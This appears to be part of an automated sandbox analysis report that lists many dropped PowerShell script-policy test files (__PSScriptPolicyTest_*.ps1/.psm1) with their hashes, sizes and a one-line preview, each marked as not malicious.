SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jp231kn.loe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afiqqp1j.wlq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arz2ase3.cf4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drilxgsu.lka.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eo54vijp.vni.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eysnka5p.d0p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hms1duhi.gds.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwbi5uaa.e3d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh0eglcu.2mu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpwi15dh.nly.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2gwv1wo.l2j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf3xiq2d.nj3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohxpm00t.kg1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okdekisl.bzv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orqcf2ik.l3o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgfb1zge.uyo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psqxnm01.pzt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhj1itz0.g2g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz0d5qfx.5zc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrejcryr.ztl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slypduxb.jbv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlu0z4f5.kiq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzfecq2q.jfe.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ua3qlk51.lgs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhuv2kaq.upz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vr5utsvp.xec.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzgdk4pn.zxp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w54jo55c.5kz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_washvsfw.24o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwp3urc4.hoi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb53p1jo.oyd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yheqx1lz.upi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqnfaz0l.ry3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yspka354.04a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

